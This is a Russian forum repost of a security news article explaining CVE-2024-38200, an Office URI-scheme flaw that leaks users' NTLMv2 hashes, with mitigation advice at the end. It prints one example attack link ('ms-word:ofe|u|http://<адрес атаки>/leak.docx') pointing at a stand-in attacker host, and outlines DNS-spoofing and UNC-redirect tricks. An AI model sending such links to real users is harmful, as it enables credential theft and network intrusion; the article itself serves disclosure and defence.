Новости CVE-2024-38200: как Office может раскрыть учётные данные пользователя?

NewsMaker

I'm just a script
Премиум
13,883
20
8 Ноя 2022
Обычные пользователи рискуют стать невольными помощниками хакеров в проведении взлома.


7lwlmgjlkfky07xvvt8p08xxtg2az2ze.jpg


Недавняя уязвимость в Microsoft Office , получившая идентификатор Для просмотра ссылки Войди или Зарегистрируйся и оценку по шкале CVSS 9.1, открывает возможность перехватывать хэши NTLMv2 и потенциально использовать их для атак на корпоративные сети. Мы уже Для просмотра ссылки Войди или Зарегистрируйся о ней в августе, однако теперь, когда все её технические подробности Для просмотра ссылки Войди или Зарегистрируйся настало время обсудить проблему более углублено.

Хэш NTLMv2 – это данные аутентификации, которые система отправляет для подтверждения личности пользователя. При правильном использовании этого хэша злоумышленники могут получить доступ к защищённым ресурсам и даже повысить свои привилегии в сети.

Основная проблема CVE-2024-38200 связана с URI-схемами Office — специальными ссылками для открытия файлов напрямую из приложений Word, Excel и других. Оказывается, через такую схему можно создать запрос к удалённому серверу и перехватить хэш NTLMv2 жертвы. Для этого нужно отправить пользователю специальную ссылку в формате «ms-word:eek:fe|u|http://<адрес атаки>/leak.docx». При попытке открыть такой файл Office запрашивает удалённый ресурс, приводя к утечке хэша.

Особенно уязвимы версии Microsoft 365 Office и Office 2019, которые позволяют загрузить удалённый файл без предупреждения. Это значительно облегчает перехват хэшей злоумышленниками. В более старых версиях, например, в Office 2016, появляется предупреждение безопасности, усложняя выполнение атаки.

Важная деталь заключается в том, что злоумышленники могут перенаправить запрос на ресурс UNC (универсальный формат пути к файлу в сети) с помощью Для просмотра ссылки Войди или Зарегистрируйся Этот приём позволяет обойти защиту и получить хэш NTLMv2 через SMB или HTTP. Атаку через HTTP проще выполнить и эффективнее использовать для дальнейших атак на серверы контроллера домена.

Успешность атаки во многом зависит от настроек безопасности (GPO) на компьютере жертвы. Так, если включена автоматическая аутентификация в зонах локальной сети или доверенных сайтов, то Office автоматически выполнит вход при открытии такой ссылки, отправив NTLMv2-хэш на сервер злоумышленника. Таким образом, даже обычный пользователь домена может невольно предоставить свои данные аутентификации.

Если же настройки безопасности более строгие, злоумышленники могут создать фальшивую DNS-запись и перенаправить запрос на свой сервер. Это также заставляет систему распознать его как локальный ресурс, после чего хэш снова оказывается в руках злоумышленников.

Для защиты от этой уязвимости рекомендуется обновить приложения Office до актуальных версий, изменить настройки локальной сети, отключив автоматическую аутентификацию, а также активировать дополнительные меры безопасности для LDAP-соединений.
 
Источник новости
www.securitylab.ru

Похожие темы